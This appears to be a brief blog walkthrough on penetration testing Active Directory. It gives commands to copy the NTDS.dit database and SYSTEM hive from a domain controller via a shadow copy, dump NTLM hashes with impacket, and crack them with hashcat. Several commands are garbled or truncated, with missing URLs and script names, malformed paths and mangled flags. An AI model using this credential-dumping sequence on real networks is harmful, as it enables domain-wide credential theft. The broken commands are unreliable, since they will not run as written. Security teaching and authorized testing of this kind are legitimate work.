Penetration Testing of Active Directory

Foreword: the following information is intended as educational contents and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions to perform evasive techniques as that is against the moral character of ethical hacking.

1. Grab the NTDS.dit and systemhive from a domain controller

vssadmin create shadow /for=C:
copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Reg SAVE HKLM\SYSTEM C:\systemhive

2. Extract the hashes using impacket (

git clone
python install
python /opt/impacket/examples/ -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract

3. Decode the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat (
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username -o ~/pentest/pentest.out — outfile-format=3 ~/pentest/pentest-ntlm-extact.ntds ~/pentest.txt — potfile-path ~/pentest/hashcat.pot
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username — show -o ~/pentest/pentest_1.out — outfile-format=3 ~/pentest/ pentest-ntlm-extact.ntds — potfile-path ~/pentest/pentest.out
  1. Plain PowerShell

Leave a Reply

Your email address will not be published. Required fields are marked *